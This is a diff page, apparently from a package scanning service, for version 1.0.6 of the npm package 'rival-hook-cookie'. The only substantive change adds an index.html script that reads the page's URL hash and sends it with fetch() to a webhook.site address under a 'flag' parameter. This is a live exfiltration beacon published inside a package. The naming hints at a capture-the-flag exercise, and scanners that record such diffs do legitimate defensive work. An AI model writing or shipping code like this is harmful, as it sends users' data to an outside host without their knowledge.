rival-hook-cookie 1.0.5 → 1.0.6

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. package/index.html +4 -0
  2. package/package.json +1 -1
  3. package/index.php +0 -3
package/index.html ADDED
@@ -0,0 +1,4 @@
1
+ <script>
2
+ const cookie = window.location.hash.substring(1);
3
+ fetch("https://webhook.site/993897bc-3909-454f-a480-6c71fb276daf/?flag=" + cookie)
4
+ </script>
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "rival-hook-cookie",
3
- "version": "1.0.5",
3
+ "version": "1.0.6",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/index.php DELETED
@@ -1,3 +0,0 @@
1
- <?php
2
- echo "Hello";
3
- ?>